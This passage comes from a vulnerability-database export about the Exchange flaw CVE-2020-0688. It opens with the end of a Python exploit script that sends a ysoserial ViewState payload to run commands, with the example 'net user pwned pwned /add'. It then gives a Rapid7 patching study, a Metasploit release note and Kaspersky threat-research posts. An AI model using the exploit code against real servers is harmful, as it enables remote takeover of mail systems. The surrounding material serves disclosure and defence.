bad')\n exit(1)\n print('[+] Login worked')\n\n ## Verify Session ID\n sSessionId = ''\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\n for cookie in oCookjar:\n if 'SessionId' in cookie.name: sSessionId = cookie.value\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\n\n ## Verify OWA Version\n sVersion = ''\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\n except: sVersion = 'favicon'\n if 'favicon' in sVersion:\n print('[*] Problem, this user has never logged in before (wizard detected)')\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\n exit(1)\n print('[+] Detected OWA version number '+sVersion)\n\n ## Verify ViewStateValue\n sViewState = ''\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\n except: pass\n if sViewState == 'B97B4E27':\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\n else:\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\n if ans == '' or ans.lower() == 'n': exit(1)\n return sSessionId, sTarget, sViewState\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\n args = parser.parse_args()\n if args.target == '' or args.username == '' or args.command == '':\n print('[!] Example usage: ')\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\n else:\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\n else: sPassword = args.password\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n oCookjar = cookielib.CookieJar()\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\n if ans.lower() == 'n': exit(0)\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\n print('[+] Got Payload: ' + sPayLoad)\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\n print(' Sending now ...')\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\n except urllib2.HTTPError, e:\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\n\nif __name__ == \"__main__\":\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-09-29T16:39:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "\n\nToday's topic is Exchange 2010, which reaches end of support (EoS) on Oct. 13, 2020, as well as a survey of other versions of Exchange and how well they are being kept up-to-date. During our work with [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), we consistently see the use of old and EoS software on the internet. This is generally a cause for concern, because this typically means that vulnerabilities will not be fixed. It is also an indicator that the environment the software is running in has other security issues.\n\nThe key takeaways from this post are:\n\n * Organizations running Exchange 2010 and earlier should upgrade to supported technology as soon as possible.\n * Organizations running Exchange 2013 should begin planning to upgrade to newer technologies.\n * Statistically speaking, most organizations running any version of Exchange are missing updates for critical vulnerabilities.\n\nBefore I move on, I want to point out that our numbers here will be fairly accurate, but not perfect. This is due to a couple of factors: First, the method that we use to fingerprint Exchange OWA allows us to determine the Exchange version down to `<major version>.<minor version>.<build number>`, but we cannot see the revision. For example, for Exchange Server 2019 Cumulative Update (CU) 7, with the latest updates the build number is `15.2.721.2`, but we only see `15.2.721`. This means that we can tell that the server is running 2019 CU7, but we can't be sure whether this month's patches were installed. Second, and most frustrating, is that Microsoft's updates don't always adjust the version number shown by tooling. Even Microsoft's own Exchange Admin Center and `Get-ExchangeServer` command will report incorrect versions in many instances.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n## Exchange 2010: A decade of support ends\n\nJust under 11 years ago, Microsoft released Exchange 2010. On Tuesday, Oct. 13, 2020, Microsoft Exchange 2010 will reach [End of Support (EoS) status](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). Microsoft will not provide **any** updates, including security fixes, after this date. While the software will keep working after this date, a quick glance at the Exchange vulnerabilities announced in 2020 will quickly show the importance of security updates.\n\nIn March 2020, we used Project Sonar to measure the number of Exchange servers that might be vulnerable to [CVE-2020-0688](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>). At that time, we found over 166,000 Exchange 2010 servers with internet-facing Outlook Web App (OWA) services. On Monday, Sept. 21, 2020, we looked again and found that while the numbers had decreased, there are still 139,771 OWA services.\n\n\n\nThat's a scary number of servers that will not receive security updates for any future vulnerabilities. Both scary and disappointing is the fact that 40,000 of these were already running unsupported versions of Exchange 2010. Nearly 54,000 of these have not been updated in six years!\n\n## Exchange 2007: Long past its expiration date\n\nSpeaking of software that hasn't seen updates in years, there are 16,577 Exchange 2007 servers with OWA on the public internet. This product has been out of support for over three years. Additionally, the newest version of Windows Server that Exchange 2007 runs on is Windows Server 2008 R2, which reached EoS in January 2020. In summary, this is a business-critical application running in an environment in which vulnerabilities will not be fixed.\n\n\n\n## Exchange 2013: The twilight years\n\nExchange 2013 transitioned to Extended Support in 2018 and will cease to be supported at all on April 11, 2023. Additionally, the newest version of Windows Server that Exchange 2013 runs on is Windows Server 2012 R2, [which reaches EoS on Oct. 10, 2023](<https://docs.microsoft.com/en-us/lifecycle/products/windows-server-2012-r2>). In short, the full Exchange 2013 environment, other than AD, will be **completely unsupported** in less than three years.\n\nOur Project Sonar metrics for OWA show that there are at least 102,593 Exchange 2013 servers on the public internet. Further, 67,567 (~66%) are not running a version of Exchange that Microsoft considers &quot;Supported.&quot;\n\n\n\nGiven that Exchange is typically considered a business-critical application, and how complex an upgrade can be, we strongly recommend that organizations running Exchange 2013 start planning the upgrade process and timeline. The \n&quot;Upgrading considerations&quot; portion of the &quot;Taking actions&quot; section at the end of the blog post calls out a few of the considerations that might make this process time-consuming or challenging.\n\n## Exchange 2016 and 2019: Newer, but still vulnerable\n\nWhile Exchange 2016 and 2019 will be supported for some time to come, organizations running them appear to be doing a poor job of keeping their environments up-to-date.\n\nOf the ~138,000 Exchange 2016 servers, 87% were missing the most recent updates.\n\n\n\nSimilarly, 77% of the ~25,000 Exchange 2019 servers we observed were missing updates. There are nearly 2,100 that, as far as we can tell, have _never_ had updates installed.\n\n\n\n## Taking action\n\nGiven the potential risks that a compromised Exchange environment present, we have the following recommendations:\n\n * Organizations using Exchange 2010 or earlier should aggressively pursue upgrading their environment to supported technologies.\n * Organizations using Exchange 2013 should ensure they have a plan and timeline for upgrading to supported technologies by April 11, 2023. Remember that the most modern version of Windows Server that 2013 supports is also going EoS that year, so the process may introduce new server OSes into the environment as well. Please see the &quot;Upgrading considerations&quot; section below for some of the challenges that may need to be accounted for.\n * Organizations using Exchange 2016 or on-premises 2019 should ensure their Exchange environment is currently up-to-date and that there is a plan and process for keeping it updated.\n * Organizations using Exchange hosted by a non-Microsoft vendor should ensure the vendor has a plan and process for keeping the software up-to-date. They should also verify this is being done and hold the vendor accountable if not.\n * Leverage [vulnerability management tools](<https://www.rapid7.com/products/insightvm/>) and other types of tools to detect when Exchange environments are missing updates. They will be particularly helpful when Exchange version numbers cannot be reliably determined.\n\n### Upgrading considerations\n\nUpgrading an Exchange environment is a very complex task that is compounded by the server and client dependencies. This is why planning in advances is critical. Here are some examples of some issues organizations may run into when planning an upgrade:\n\n * **Upgrading from Exchange 2010:** There is no direct upgrade path from Exchange 2010 to Exchange 2019. Organizations will need to upgrade to Exchange 2013 or 2016 first.\n * **Active Directory (AD) server OS:** Exchange 2019 doesn't support Windows Server 2012 AD servers and requires the AD forest functional level to be at least 2012 R2.\n * **TLS:** Exchange 2019, by default, requires TLS 1.2. This means that clients will need to support TLS 1.2, or other workarounds will need to be implemented in order to support legacy clients.\n * **Outlook compatibility:** Exchange 2019 requires at least Outlook 2013 with the most recent updates. Keep in mind that Outlook 2013 goes EoS April 11, 2023, so those leveraging it should upgrade to Outlook 2016 or higher.\n * **Unified Messaging (UM):** UM was removed in Exchange 2019\n * **Web browser compatibility:** Exchange 2019 doesn't support Internet Explorer 10 or lower.\n\n#### Assess Your Environment for Microsoft Exchange Vulnerabilities and Take Action\n\n[Get Started](<https://www.rapid7.com/trial/insightvm/>)", "modified": "2020-09-29T16:05:16", "published": "2020-09-29T16:05:16", "id": "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "href": "https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/", "type": "rapid7blog", "title": "Microsoft Exchange 2010 End of Support and Overall Patching Study", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T20:40:17", "bulletinFamily": "info", "cvelist": ["CVE-2018-2393", "CVE-2020-0688", "CVE-2020-1472"], "description": "## SAP Internet Graphics Server (IGS)\n\n\n\nThis week includes a new module targeting the SAP Internet Graphics Server application, contributed by community member [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>). This particular module covers two CVEs that are both XML External Entity (XXE) bugs that are remotely exploitable. The module comes fully featured with the ability to check for the presence of the vulnerabilities as well as two methods to leverage them. The first is a read action that allows users to read files from the remote server, while the second can be used to trigger a denial of service (DoS) condition.\n\n## Just read the (new Zerologon) docs\n\nThe module documentation for the Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=wrapup>)) module has been updated with details of how to run the entire attack workflow through Metasploit. This specifically included leveraging the new `auxiliary/gather/windows_secrets_dump` which can recover the machine password to restore on the targeted Domain Controller and using the PSexec module to execute a payload. It\u2019s important to restore the machine account password to prevent services from breaking. Module documentation can be accessed from msfconsole by using the `info -d` command. The most recent Metasploit Demo meeting also covered this content, [showing](<https://www.youtube.com/watch?v=Z5oQmHVsqjA&t=1648>) the newly documented workflow in action.\n\n## New modules (1)\n\n * [SAP Internet Graphics Server (IGS) XMLCHART XXE](<https://github.com/rapid7/metasploit-framework/pull/14163>) by Vladimir Ivanov and Yvan Genuer, which exploits [CVE-2018-2393](<https://attackerkb.com/topics/EmAs1SnpOK/cve-2018-2393?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Update sap_service_discovery.rb to support discovering SAP IGS servers](<https://github.com/rapid7/metasploit-framework/pull/14238>) by Vladimir Ivanov\n * [Tab-completion improved for module OPTIONS not available](<https://github.com/rapid7/metasploit-framework/pull/14070>) by mariabelenTC\n * [Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates](<https://github.com/rapid7/metasploit-framework/pull/14213>) by Alan David Foster\n * [Add the DOMAIN option to the CVE-2020-0688 Exploit](<https://github.com/rapid7/metasploit-framework/pull/14190>) by Spencer McIntyre\n * [Update the module docs for CVE-2020-1472 (Zerologon)](<https://github.com/rapid7/metasploit-framework/pull/14204>) by Spencer McIntyre\n\n## Bugs fixed\n\n * [Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error](<https://github.com/rapid7/metasploit-framework/pull/14028>) by Alan David Foster\n * [Always show module actions within the info command](<https://github.com/rapid7/metasploit-framework/pull/14233>) by Alan David Foster\n * [Remove modules whose deprecation date has passed](<https://github.com/rapid7/metasploit-framework/pull/14242>) by Spencer McIntyre\n * [Convert myworkspace.id to myworkspace_id for no db compat](<https://github.com/rapid7/metasploit-framework/pull/14226>) by h00die\n * [Disconnect the named pipe and break after the impersonation callback](<https://github.com/rapid7/metasploit-payloads/pull/438>) by Spencer McIntyre\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-01T17%3A52%3A23%2B01%3A00..2020-10-08T11%3A41%3A44-05%3A00%22>)\n * [Full diff 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/compare/6.0.9...6.0.10>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-10-09T19:41:47", "published": "2020-10-09T19:41:47", "id": "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "href": "https://blog.rapid7.com/2020/10/09/metasploit-wrap-up-82/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "\n\nOn June 17, we hosted our first &quot;GReAT Ideas. Powered by SAS&quot; session, in which several experts from our Global Research and Analysis Team shared insights into APTs and threat actors, attribution, and hunting IoT threats.\n\nHere is a brief summary of the agenda from that webinar:\n\n * Linking attacks to threat actors: case studies by Kurt Baumgartner\n * Threat hunting with Kaspersky&#x27;s new malware attribution engine by Costin Raiu\n * Microcin-2020: GitLab programmers ban, async sockets and the sock by Denis Legezo\n * The next generation IoT honeypots by Dan Demeter, Marco Preuss, and Yaroslav Shmelev\n\nSadly, the two hours of the session were not enough for answering all of the questions raised, therefore we try to answer them below. Thanks to everyone who participated, and we appreciate all the feedback and ideas!\n\n## Questions about threat actors and APTs\n\n 1. _How do you see Stonedrill deployment comparing now? Its discovery was based on lucky structural similarities with Shamoon, but do you see it actively used or correlating to the spread of this malware?_\n\nThere is some 2020 activity that looks like it could be Stonedrill related, but, in all likelihood, it is not. We are digging through details and trying to make sense of the data. Regardless, wiper activity in the Middle East region from late 2019 into early 2020 deployed code dissimilar to Stonedrill but more similar to Shamoon wipers. We stuck with the name &quot;Dustman&quot; \u2013 it implemented the Eldos ElRawDsk drivers. Its spread did not seem Stonedrill related.\n\nAt the same time, no, the Stonedrill discovery was not based on luck. And, there are multiple overlaps between Shamoon 2.0 and Stonedrill that you may review under &quot;Download full report&quot; in &#x27;[From Shamoon to StoneDrill](<https://securelist.com/from-shamoon-to-stonedrill/77725/>)&#x27; blogpost. You might note that Stonedrill is a somewhat more refined and complex code, used minimally.\n\nWhile the Shamoon spreader shared equivalent code with Orangeworm&#x27;s Kwampirs spreader, and are closely linked, we have not seen the same level of similarity with Stonedrill. However, several of the Shamoon 2.0 executables share quite a few unique genotypes with both Stonedrill and Kwampirs. In the above paper, we conclude that Stonedrill and Shamoon are most likely spread by two separate groups with aligned interests for reasons explained in the report PDF. Also, it may be that some of the codebase, or some of the resources providing the malware, are shared.\n 2. _Do the authors of Shamoon watch these talks?_\n\nPerhaps. We know that not only do offensive actors and criminals attempt to reverse-engineer and evade our technologies, but they attempt to attack and manipulate them over time. Attending a talk or downloading a video later is probably of interest to any group.\n 3. _Are there any hacker-for-hire groups that are at the top level? How many hacker-for-hire groups do you see? Are there any hacker-for-hire groups coming out of the West?_\n\nYes. There are very capable and experienced hack-for-hire groups that have operated for years. We do not publicly report on all of them, but some come up in the news every now and then. At the beginning of 2019, Reuters reported insightful content on a top-level mercenary group and their Project Raven in the Middle East, for example. Their coordination, technical sophistication and agile capabilities were all advanced. In addition to the reported challenges facing the Project Raven group, some of these mercenaries may be made up of a real global mix of resources, presenting moral and ethical challenges.\n 4. _I assume Sofacy watches these presentations. Has their resistance to this analysis changed over time?_\n\nAgain, perhaps they do watch. In all likelihood, what we call &quot;Sofacy&quot; is paying attention to our research and reporting like all the other players.\n\nSofacy is an interesting case as far as their resistance to analysis: their main backdoor, SPLM/CHOPSTICK/X-Agent, was modular and changed a bit over the course of several years, but much of that code remained the same. Every executable they pushed included a modified custom encryption algorithm to hide away configuration data if it was collected. So, they were selectively resistant to analysis. Other malware of theirs, X-Tunnel, was re-coded in .Net, but fundamentally, it is the same malware. They rotated through other malware that seems to have been phased out and may be re-used at some point.\n\nThey are a prolific and highly active APT. They added completely new downloaders and other new malware to their set. They put large efforts into non-executable-based efforts like various credential harvesting techniques. So, they have always been somewhat resistant to analysis, but frequently leave hints in infrastructure and code across all those efforts.\n\nZebrocy, a subset of Sofacy, pushed malware with frequent changes by recoding their malware in multiple languages, but often maintain similar or the same functionality over the course of releases and re-releases. This redevelopment in new and often uncommon languages can be an issue, but something familiar will give it away.\n 5. _Have we seen a trend for target countries to pick up and use tools/zero-days/techniques from their aggressors? Like, is Iran more likely to use Israeli code, and vice versa?_\n\nFor the most part, no, we don&#x27;t see groups repurposing code potentially only known to their adversary and firing it right back at them, likely because the adversary knows how to, and probably is going to watch for blowback.\n\nTangentially, code reuse isn&#x27;t really a trend, because offensive groups have always picked up code and techniques from their adversaries, whether or not these are financially motivated cybercriminal groups or APT. And while we have mentioned groups &quot;returning fire&quot; in the past, like Hellsing [returning spear-phish](<https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/>) on the Naikon APT, a better example of code appropriation is VictorianSambuca or Bemstour. We talked about it at our T3 gathering in Cancun in October. It was malware containing an interesting zero-day exploit that was collected, re-purposed, touched up and re-deployed by APT3, HoneyMyte and others. But as far as we know, the VictorianSambuca package was picked up and used against targets other than its creator.\n\nAlso, somewhere in the Darkhotel/Lazarus malware sets, there may be some code blowback, but those details haven&#x27;t yet been hammered out. So, it does happen here and there, maybe out of necessity, maybe to leave a calling card and shout-out, or to confuse matters.\n 6. _If using API-style programming makes it easier to update malware, why don&#x27;t more threat actors use it?_\n\nI think here we are talking about Microcin last-stage trojan exported function callbacks. Nobody could tell for sure, but from my point of view, it&#x27;s a matter of the programmer&#x27;s experience. The &quot;senior&quot; one takes a lot into consideration during development, including architectural approach, which could make maintenance easier in the future.\n\nThe &quot;junior&quot; one just solves the trojan&#x27;s main tasks: spying capabilities, adds some anti-detection, anti-analysis tricks, and it&#x27;s done. So maybe if the author has &quot;normal&quot; programming experience, he carefully planned data structures, software architecture. Seems like not all of the actors have developers like that.\n 7. _Have you seen proxying/tunneling implants using IOTs for APT operations, such as the use of SNMP by CloudAtlas? Do you think that&#x27;s a new way to penetrate company networks? Have you ever encountered such cases?_\n\nWe watched the massive Mirai botnets for a couple years, waiting to see an APT takeover or repurposing, and we didn&#x27;t find evidence that it happened. Aside from that, yes, APT are known to have tunneled through a variety of IOT to reach their intended targets. IOT devices like security web cams and their associated network requirements need to be hardened and reviewed, as their network connections may lead to an unintended exposure of internal resources.\n\nWith elections around the world going on, municipalities and government agencies contracting with IT companies need to verify attack surface hardening and understand that everything, from their Internet-connected parking meters to connected light bulbs, can be part of a targeted attack, or be misused as a part of an incident.\n 8. _How often do you see steganography like this being used by other actors? Any other examples?_\n\nSteganography isn&#x27;t used exclusively by the SixLittleMonkeys actor for sure. We could also mention here such malware as NetTraveller, Triton, Shamoon, Enfal, etc. So, generally, we could say the percentage of steganography usage among all the malicious samples is quite low, but it happens from time to time.\n\nThe main reason to use it from malefactors&#x27; point of view is to conceal not just the data itself but the fact that data is being uploaded or downloaded. E.g. it could help to bypass deep packet inspection (DPI) systems, which is relevant for corporate security perimeters. Use of steganography may also help bypass security checks by anti-APT products, if the latter cannot process all image files.\n\n## Questions about KTAE (Kaspersky Threat Attribution Engine)\n\nFor more information, please also have a look at our previous blogpost, [Looking at Big Threats Using Code Similarity. Part 1](<https://securelist.com/big-threats-using-code-similarity-part-1/97239/>), as well as at our [product page](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>).\n\n 9. _What are &quot;genotypes&quot;?_ \nGenotypes are unique fragments of code, extracted from a malware sample.\n 10. _How fine-grained do you attribute the binaries? Can you see shared authors among the samples?_ \nKTAE does not include author information per se. You can see shared relevant code and strings overlaps.\n 11. _Are genotypes and YARA rules connected?_ \nNot directly. But you can use genotypes to create effective YARA rules, since the YARA engine allows you to search for byte sequences.\n 12. _How many efforts do you see for groups to STEAL+REUSE attribution traces on purpose?_ \nWe have seen such efforts and reported about them, for example with [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>)\n 13. _How do you go about removing third-party code sharing?_ \nWe incorporated our own intelligence to only match on relevant parts of the samples.\n 14. _Do genotypes work on different architectures, like MIPS, ARM, etc.? I&#x27;m thinking about IoT malware._ \nYes, they work with any architecture.\n 15. _What determines your &quot;groundtruth&quot;?_ \nGroundtruth is a collection of samples based on our 20+ years of research and classification of malware.\n 16. _Can KATE be implemented in-house?_ \nWe offer multiple options for deploying KTAE. Please get in touch with us for more info: https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool.\n 17. _For the attribution engine, would you expect APT-group malware authors to start integrating more external code chunks from other groups to try to evade attribution?_ \nWe see such behavior; please refer to Question 12 above.\n 18. _Do you feel more manufacturers will follow Kaspersky&#x27;s suit in letting victims know the threat actors behind malware detections on endpoints?_ \nAt the moment, KTAE is a standalone solution not integrated in endpoints.\n 19. _What is the parameter for looking at the similarity in malware code? Strings? Packer? Code? What else?_ \nKTAE uses genotypes to match similarities.\n 20. _How do I make a difference, if for example, I am a threat actor and reuse the code form some APT Group? How to define it is really the same actor and not just an impersonator who used the same code or malware, or reused the malware for my operation?_ \nKTAE handles code similarities for malware samples to provide relevant information on that basis. Further information to be used for attribution may be TTPs, etc. for which you may find our [Kaspersky Threat Intelligence Services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) helpful.\n 21. _I guess the follow-up is,- will they be able to evade the attribution after watching these webinars, learning about the attribution engine?_ \nIt&#x27;s known that such techniques can be used to do technical attribution on malware-sample basis. Attempts at evading these would mean knowing all the details and metrics and database entries (including updates) to check against something rather complex and difficult.\n 22. _Can you start taking the samples submitted by CYBERCOM and just post publicly what KTAE says in the future?_ \nWe are posting certain interesting findings, e.g. on Twitter.\n 23. _How do we buy KTAE? Is it a private instance in our own org or hosted by you?_ \nWe offer multiple options for deploying KTAE. Please get in touch with us for more info: https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool.\n 24. _Can you expand on how you identify a genotype and determine that it is unique?_ \nGenotypes are unique fragments of code, extracted from a malware sample. As for uniqueness, there is a good reference: the Fruit Ninja Game. We played Fruit Ninja and extracted (sliced) genotypes from all good programs that are known to us, then we did the same with malicious samples and samples marked as APTs. After that operation, we knew all genotypes that belonged to good programs and removed them from the databases that belonged to bad ones. We also save the numbers of times genotypes appear in the samples, so we can identify the really unique stuff.\n 25. _How many zero-day vendors do you see with this engine?_ \nKTAE is not handling vulnerabilities but only code fragments and such, for similarity checks.\n 26. _In the future, do you see a product like KTAE being integrated into security offerings from Kaspersky, so that samples can be automatically scanned when detected as an alert, as opposed to individually uploading them?_ \nWe are planning to do cross-product integration.\n 27. _Have you run The Shadowbrokers samples through KTAE and if so, were there any unexpected overlaps?_ \nYes, we did. We found an overlap between Regin samples and cnli-1.dll\n 28. _Could it be easy for a threat actor to change code to avoid KTAE identification?_ \nTheoretically, yes. Assuming they produce never-before-seen genotypes, KTAE might miss classifying that malware. With that being said, generating completely new genotypes requires a lot of time and money, plus a lot of careful work. We wish threat actors good luck with that. \ud83d\ude42\n 29. _When you attribute a campaign, do you also consider some aspects relating to sociopolitical events?_ \nAt Kaspersky, we only do technical attribution, such as based on similarities in malware samples or TTPs of groups; we don&#x27;t do attribution on any entity, geopolitical or social level.\n\n## Questions about IoT threats and honeypots\n\nIf you want to join our honeypot project, please get in touch with us at honeypots@kaspersky.com.\n\n 30. _Do you have any IoT dataset available for academia?_ \nPlease get in touch with us via our email address listed above (honeypots@kaspersky.com).\n 31. _How does a system choose which honeypots to direct an attack at?_ \nWe developed this modular and flexible infrastructure with defined policies to handle that automatically, based on the attack.\n 32. _Okay, so, soon, IoT malware will do a vmcheck before it loads\u2026. Then what?_ \nIn our honeypots, we use our own methods to defeat anti-VM checks. Depending on future development of malware, we are also prepared to adjust these to match actual vmcheck methods.\n 33. _Do the honeypots support threat intelligence formats like STIX and TAXII?_ \nCurrently, such a feature is not available yet. If there is interest, we can implement this to improve the use for our partners.\n 34. _Can anyone partner with you guys? Or do they need certain visibility or infrastructure to help out?_ \nAnyone with a spare IP-address and able to host a Linux system to receive attacks can participate. Please get in touch with us at honeypots[at]kaspersky[dot]com.\n\n## Questions about Kaspersky products and services\n\n 35. _What new technology has Kaspersky implemented in their endpoint product? As EDR is the latest emerging technology, has Kaspersky implemented it in their endpoint product?_ \nKaspersky Endpoint product contains EDR besides other cutting-edge technologies. There are more details listed here on [the product page](<https://www.kaspersky.com/enterprise-security/endpoint-product>).\n 36. _What do you think of the Microsoft Exchange Memory Corruption Vulnerability bug? How can Kaspersky save the host system in such attacks?_ \nWe should know the CVE number of the bug the question refers to. From what we know, one of &quot;loud&quot; bugs that was fixed recently was CVE-2020-0688. It is referenced [here](<https://support.microsoft.com/en-us/help/4536987/security-update-for-exchange-server-2019-and-2016>). We detect this vulnerability in our products using the Behavior Detection component with the verdict name: PDM:Exploit.Win32.GenericAlso, Kaspersky products have vulnerability scanners that notify you about vulnerabilities in installed software, and we also [provide](<https://www.kaspersky.com/small-to-medium-business-security/downloads/systems-management>) a patch management solution for business environments that helps system administrators handle software updates for all computers and servers on the corporate network.\n 37. _How can a private DNS protect the Host System from attacks?_ \nWhile DNS is a key component of the Internet, disrupting DNS queries can impact a large portion of Internet users. We know for sure the people running DNS Root servers are professionals and know their job really well, so we are not worried that much about Root servers being disrupted. Unfortunately, attackers sometimes focus on specific DNS resolvers and manage to disrupt large portions of the Internet, as in the [2016 DDoS against the Dyn DNS resolver](<https://en.wikipedia.org/wiki/2016_Dyn_cyberattack>). Although it is limited in its use, a private DNS system can protect against large DDoS attacks, because it will be private and may be harder to reach by the attackers.\n\n## Advanced questions raised\n\nWe are not afraid of tough questions; therefore, we did not filter out the following ones.\n\n 38. _Where can we get one of those shirts Costin is wearing?_ \nWe are about to launch a GReAT merchandise shop soon \u2013 stay tuned.\n 39. _Who cut Jeff&#x27;s hair?_ \nEdward Scissorhands. He&#x27;s a real artist. Can recommend.\n 40. _Did Costin get a share from the outfits found in the green Lambert&#x27;s house when it got raided?_ \nWe can neither confirm nor deny.\n 41. _Who is a better football team, Steelers or Ravens?_ \nFootball? Is that the game where they throw frisbees?\n\nWe hope you find these answers useful. The next series of the GReAT Ideas. Powered by SAS webinars, where we will share more of our insights and research, will take place on July 22. You can register for the event here: <https://kas.pr/gi-sec>\n\nAs we promised, some of the best questions asked during the webinar will be awarded with a prize from the GReAT Team. The winning questions are: \n&quot;Are there any hacker for hire groups that are at the very top level? How many hackers-for-hire groups do you see? Are there any hacker for hire groups coming out of the west?&quot; \n&quot;Can you expand on how you identify a genotype and determine that it is unique?&quot;\n\nWe will contact those who submitted these questions shortly.\n\nFeel free to follow us on Twitter and other social networks for updates, and feel free to reach out to us to discuss interesting topics.\n\nOn Twitter:\n\n * Costin Raiu: @craiu\n * Kurt Baumgartner: @k_sec\n * Denis Legezo: @legezo\n * Dan Demeter: @_xdanx\n * Marco Preuss: @marco_preuss\n * Yury Namestnikov: @SomeGoodOmens", "modified": "2020-07-15T10:00:13", "published": "2020-07-15T10:00:13", "id": "SECURELIST:F05591B26EFD622E6C72E180A7A47154", "href": "https://securelist.com/great-ideas-follow-up/97816/", "type": "securelist", "title": "GReAT Ideas follow-up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2008-3431", "CVE-2019-10149", "CVE-2020-0688"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact &#x27;[intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)&#x27;.\n\n## **The most remarkable findings**\n\nOn May 11, the UK-based supercomputing center, ARCHER, announced that it would shut down access to its network while it investigated a security incident. The website stated that the &quot;ARCHER facility is based around a Cray XC30 supercomputer (with 4920 nodes) that provides the central computational resource&quot;. At the same time, the German-based bwHPC also announced a security incident and decided to restrict access to its resources. The Swiss National Supercomputing Centre, at the time involved in a project to study the small membrane protein of the coronavirus, confirmed that it, and other European high-performance computer facilities, had been attacked and that it had temporarily closed. On May 15, the EGI Computer Security and Incident Response Team (EGI-CSIRT) published an alert covering two incidents that, according to its report, may or may not be related. Both incidents describe the targeting of academic data centers for &quot;CPU mining purposes&quot;. The alert includes a number of IoCs, which complement other OSINT (open-source intelligence) observations. Although we weren&#x27;t able to establish with a high degree of 